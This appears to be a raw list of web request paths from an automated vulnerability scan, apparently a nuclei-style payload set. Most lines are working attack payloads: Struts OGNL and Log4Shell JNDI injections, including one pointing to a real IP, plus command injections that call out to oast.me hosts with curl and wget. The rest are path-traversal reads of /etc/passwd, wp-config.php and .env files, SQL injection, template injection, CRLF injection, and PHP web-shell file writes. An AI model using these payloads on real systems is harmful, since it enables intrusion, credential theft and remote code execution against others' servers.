live
live/h264
live/h264/ch1
live/h264/ch2
live/mjpeg
$%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue,%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29,%23b%3Dnew%20java.io.InputStreamReader%28%23a%29,%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29,%23d%3Dnew%20char%5B51020%5D,%23c.read%28%23d%29,%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23sbtest.println%28%23d%29,%23sbtest.close%28%29%29%7D/actionChain1.action
$%7Bjndi:ldap://115.28.134.231:1389/Exploit%7D
.%0D./.%0D./.%0D./.%0D./bin/sh
%20../web-inf/
25twdIMfRgQmjF6PvkbGAf9JfsL.php
25twdJjfpeOIAfKLGmXIrR58YEK.php%5Cx0A
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fGemfile HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpackage.json HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fpackage-lock.json HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fweb.config HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2fGemfile HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2fpackage.json HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2fpackage-lock.json HTTP/1.1
%2e%2e%2f%2e%2e%2f%2e%2e%2fweb.config HTTP/1.1
%2e%2e%2f%2e%2e%2fGemfile HTTP/1.1
%2e%2e%2f%2e%2e%2fpackage.json HTTP/1.1
%2e%2e%2f%2e%2e%2fpackage-lock.json HTTP/1.1
%2e%2e%2f%2e%2e%2fweb.config HTTP/1.1
%2e%2e%2fGemfile HTTP/1.1
%2e%2e%2fpackage.json HTTP/1.1
%2e%2e%2fpackage-lock.json HTTP/1.1
%2e%2e%2fweb.config HTTP/1.1
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1
...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
//%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd HTTP/1.1
about/../tree?action=get
account
account/register
?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
actions/authenticate.php
actuator/env
actuator/jolokia/exec/com.sun.management:type%3DDiagnosticCommand/compilerDirectivesAdd/%21/etc%21/passwd
?a=display&templateFile=README.md
adm/file.cgi?next_file=%2fetc%2fpasswd
admin/
admin/elfinder/elfinder-cke.html
admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0
admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=25twdFn1R8IFMZbaRUqgJ2XrBY6.php&target=l1_Lw
administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
admin/login/?next=/admin/
adm/krgourl.php?DOCUMENT_ROOT=http://c8gn9o4dtd8ppc0tpffgceoa8oayynbxn.oast.me
agc/vicidial_mysqli_errors.txt
ajax/api/content_infraction/getIndexableContent
ajax/networking/get_netcfg.php?iface=;curl%20http://c8gn9o4dtd8ppc0tpffgceoz5weyyy6oo.oast.me/`whoami`;
ajax/render/widget_tabbedcontainer_tab_panel
aj.html?a=devi
analytics/telemetry/ph/api/hyper/send?_c&_i=test
anchor/errors.log
.antproxy.php
api/25twdGL170TlhcqVAP2C4ThFMek
api/config
api/downloads?fileName=../../../../../../../../etc/passwd
api/.env
api/experimental/dags/example_trigger_target_dag/dag_runs
api/experimental/dags/example_trigger_target_dag/paused/false
api/experimental/test
api/login
api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
api/settings/values
apisix/admin/user/login
apisix/batch-requests
api/userrolelist/systemRoles?require-cfg.js
api/users/admin/check
api/v4/ci/lint?include_merged_yaml=true
appGet.cgi?hook=get_cfg_clientlist()
applications.pinpoint
apply_sec.cgi
artifactory/ui/auth/login?_spring_security_remember_me=false
artifactory/ui/repodata?deploy=true
assets/app/something/services/AppModule.class/
assets/backend/elfinder/elfinder-cke.html
assets/elFinder-2.1.9/elfinder.html
assets/elFinder/elfinder.html
assets/file:///etc/passwd
?author=1
.axiom/accounts/do.json
axis2-admin/login
axis2/axis2-admin/login
backend/elfinder/elfinder-cke.html
badging/badge_print_v0.php?tpl=../../../../../etc/passwd
bag2
boardDataWW.php
BSW_cxttongr.htm
bugs/verify.php?confirm_hash=&id=1
/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml? HTTP/1.1
/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml? HTTP/1.1
/%C0%AE%C0%AE/WEB-INF/web.xml? HTTP/1.1
carbon/admin/login_action.jsp
card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
casa/nodes/thumbprints
catalog.php?filename=../../../../../../../../../etc/passwd
?c=../../../../../../etc/passwd%00
cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25twdNSQaTD7AIbb34p77k1iifo.jsp
cgi-bin/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/bin/sh
cgi-bin/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
cgi-bin/../../../bin/sh
cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
cgi-bin/../../../../etc/passwd
cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd
cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27
cgi-bin/login.cgi
cgi-bin/luci/
cgi-bin/privatekey.pem
cgi-bin/system_mgr.cgi
cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget
cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
cgi/networkDiag.cgi
checkValid
__clockwork/app
command.cgi?cat%20/etc/passwd
comm.php?id=../../../../../../../../../../etc/passwd
components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
compress.php?file=../../../../../../../etc/passwd
concrete5/index.php/install
../conf/config.properties
config/databases.yml
config.js
confluence/pages/createpage-entervariables.action
confluence/pages/createpage-entervariables.action?SpaceKey=x
console/
console/j_security_check
console/login/LoginForm.jsp
contrib/acog/print_form.php?formname=../../../etc/passwd%00
crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E
cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO
css/../../../../../../../../../../../../../../../../../../windows%5Cwin.ini
cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
.dbeaver/credentials-config.json
device.rsp?opt=user&cmd=list
devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
DnnImageHandler.ashx?mode=file&url=http://c8gn9o4dtd8ppc0tpffgceoz5rayyyh1r.oast.me
.dockercfg
.docker/config.json
document.php?modulepart=project&file=../../../../../../../etc/passwd
download.php?file=../../../../../etc/passwd
downloads/../../../../../../../../../etc/passwd
download?type=files&filename=../../../../../../../../etc/passwd
.drone.yml
druid/index.html
duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))
eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
elfinder/elfinder-cke.html
en/php/usb_sync.php
.env
.env_1
.env.backup
.env.development.local
.env.dev.local
.env.example
.env.live
.env.local
.env.old
.env.prod.local
.env.production.local
.env_sample
.env.save
.env.stage
.esmtprc
esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";
etc/groovyconsole.html
.../.../.../.../.../.../.../.../.../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../..//etc/passwd
../../etc/passwd
/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
/../../../../../../../../etc/passwd%00.jsp HTTP/1.1
/../../../../../../../../etc/passwd%C0%80.jsp HTTP/1.1
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../etc/passwd HTTP/1.1
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\etc/passwd HTTP/1.1
exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
favicon.ico
fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
file%3DC:%5CWindows%5Cwin.ini
?file=http://0177.0.0.1/etc/passwd
filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
fpui/loginServlet
_fragment?_path=_controller=phpcredits&flag=-1
ftb.imagegallery.aspx
fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
../../../../../Gemfile HTTP/1.1
../../../../Gemfile HTTP/1.1
../../../Gemfile HTTP/1.1
../../Gemfile HTTP/1.1
../Gemfile HTTP/1.1
general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
getcfg.php
glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
goform/setmac
GponForm/diag_Form?images/
groovyconsole
guest_auth/guestIsUp.php
homeaction.php
?host=http://127.0.0.1/server-status
host.key
html/log
http/index.php
hue/assets/../../../../../../../etc/passwd
_ignition/execute-solution
image/image://..%252fetc%252fpasswd
images/../info.html
images/logo/logo-eoffice.php
includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
index/login.cgi
index.php
index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225twdIMfRgQmjF6PvkbGAf9JfsL.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B
index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
index.php?class=../../../../../../../etc/passwd%00
index.php?id=50&file=../../../../../../../../../etc/passwd
index.php/install
index.php?m=member&f=login_save
index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)
index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jejob&view=../../../../../../etc/passwd%00
index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
index.php?page=/etc/passwd%00
index.php?page_slug=../../../../../etc/passwd%00
index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
index.php?plot=;wget%20http://c8gn9o4dtd8ppc0tpffgceoa8heyynn5h.oast.me
index.php?s=Admin-Data-down&id=../../Conf/config.php
index_sso.php
infusions/downloads/downloads.php?cat_id=${system(ls)}
install/
install/includes/configure.php
install/install.php?step=4
install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
ipython/tree
jars/upload
javax.faces.resource/dynamiccontent.properties.xhtml
jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
jolokia/exec/com.sun.management:type%3DDiagnosticCommand/compilerDirectivesAdd/%21/etc%21/passwd
jolokia/read/getDiagnosticOptions
jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::
lcms/index.php
LetsEncrypt/Index?fileName=/etc/passwd
localhost.key
login
login/
login?login=lutron&password=lutron
login.php
login.php?action=login&type=admin
lucee/25twdDlGC2WB0UMfL2wEIzxdN1B.cfm
lucee/admin/imgProcess.cfm?file=/../../../context/25twdDlGC2WB0UMfL2wEIzxdN1B.cfm
lucee/admin/imgProcess.cfm?file=/whatever
magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
mailingupgrade.php
mailsms/s?func=ADMIN:appState&dumpConfig=/
mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
maint/modules/home/index.php?lang=english|cat%20/etc/passwd
manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
mantisbt-2.3.0/verify.php?id=1&confirm_hash=
mantisBT/verify.php?id=1&confirm_hash=
mantis/verify.php?id=1&confirm_hash=
mifs/.%3B/services/LogService
msa/../../../../../../../../etc/passwd
msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld
nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st
NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
node/1?_format=hal_json
node_modules/mqtt/test/helpers/
nuclei.txt
nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml
op/op.Login.php
orders/3
overview.asp
owa/auth/x.js
../../../../package.json HTTP/1.1
../../../package.json HTTP/1.1
../../package.json HTTP/1.1
../package.json HTTP/1.1
../../../../package-lock.json HTTP/1.1
../../../package-lock.json HTTP/1.1
../../package-lock.json HTTP/1.1
../package-lock.json HTTP/1.1
pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
pages/createpage.action?spaceKey=myproj
pages/createpage-entervariables.action
pages/createpage-entervariables.action?SpaceKey=x
pages/doenterpagevariables.action
pages/systemcall.php?command=cat%20/etc/passwd
pages/templates2/viewpagetemplate.action
password.cgi
password.html
password.jsn
pentaho/api/userrolelist/systemRoles?require-cfg.js
pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
plugin/customMethod
_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
private-key
public/config.js
public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
?q=node&destination=node
?qtproxycall=http://c8gn9o4dtd8ppc0tpffgceozsyeyyyudw.oast.me
query?db=db&q=SHOW%20DATABASES
remote/fgt_lang?lang=/../../../..//////////dev/
ReportServer?op=fr_server&cmd=sc_getconnectioninfo
ReportServer/Pages/ReportViewer.aspx
res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
robots.txt
rootDesc.xml
RPC2_Login
run
scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
scrm/crm/admin
_search
searchblox/servlet/FileServlet?col=9&url=/etc/passwd
_search?pretty
search?search_key=%7B%7B1337*1338%7D%7D
sensorlist.htm
server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
service/v1/service-details
sess-bin/login_handler.cgi
Side.php
signEzUI/playlist/edit/upload/../../../../../../../../../../etc/passwd
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
sitemap.xml
snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains
solr/admin/
solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8gn9o4dtd8ppc0tpffgceoadqeyybzrr.oast.me/a%7D
solr/admin/cores?wt=json
SSI/Auth/ip_snmp.htm
status.htm
struts2-rest-showcase/orders/3
sysmgmt/2015/bmc/session
system/sharedir.php
template/custom/content-editor
templates/editor-preload-container
testing-put.txt
tests/support/stores/test_grid_filter.php?query=phpinfo();
test.txt%0D%0ASet-Cookie:CRLFInjection%3DTest%0D%0ALocation:%20example.com%0D%0AX-XSS-Protection:0
theme/default/img/../../../../../../../../../../../../../../../..//etc/passwd
/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd HTTP/1.1
/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini HTTP/1.1
ucmdb-api/connect
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd HTTP/1.1
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini HTTP/1.1
ui/login.php?user=admin
uir//etc/passwd
upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''
uploads/assets/backend/elfinder/elfinder-cke.html
uploads/assets/backend/elfinder/elfinder.html
uploads/elfinder/elfinder-cke.html
upload/UploadResourcePic.ashx?ResourceID=8382
?url=http://0177.0.0.1/server-status
_users/org.couchdb.user:poc
users/sign_in
users/user-dark-features
../../../../../../../../../../../../../../var/www/html/index.html
verify.php?id=1&confirm_hash=
version.web
viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
vpn/../vpns/cfg/smb.conf
wan.htm
wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
webadmin/auth/verification.php
webadmin/index.php
webadmin/out
webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
webapi/v1/system/accountmanage/account
../../../../../web.config HTTP/1.1
../../../../web.config HTTP/1.1
../../../web.config HTTP/1.1
../../web.config HTTP/1.1
../web.config HTTP/1.1
web.config.i18n.ashx?l=nuclei&v=nuclei
/../../../WEB-INF/web.xml%00.jsp HTTP/1.1
/../../WEB-INF/web.xml%00.jsp HTTP/1.1
/../../../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
/../../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
/../WEB-INF/web.xml%C0%80.jsp HTTP/1.1
/../../../WEB-INF/web.xml? HTTP/1.1
/../WEB-INF/web.xml? HTTP/1.1
WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
website/blog/
webtools/control/main
.well-known/security.txt
wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
wiki/pages/createpage-entervariables.action
wiki/pages/createpage-entervariables.action?SpaceKey=x
..../..../..../..../..../..../..../..../..../windows/win.ini
.../.../.../.../.../.../.../.../.../windows/win.ini
../../../../../../../../windows/win.ini
/../../../../../../../../windows/win.ini%00.jpg HTTP/1.1
/../../../../../../../../windows/win.ini%C0%80.jsp HTTP/1.1
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../windows/win.ini HTTP/1.1
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\windows/win.ini HTTP/1.1
wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
wls-wsat/RegistrationRequesterPortType
wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
wp-admin/install.php
wp-content/force-download.php?file=../wp-config.php
wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
wp-content/plugins/quiz-master-next/README.md
wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php
wp-content/plugins/simple-file-list/ee-file-engine.php
wp-content/plugins/simple-file-list/ee-upload-engine.php
wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
wp-content/plugins/wp-statistics/readme.txt
wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
wp-content/uploads/simple-file-list/nuclei.php
wp-json/acf/v3/options/a?id=active&field=plugins
wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
www.key
XMLCHART
xmlpserver/ReportTemplateService.xls
zms/admin/index.php
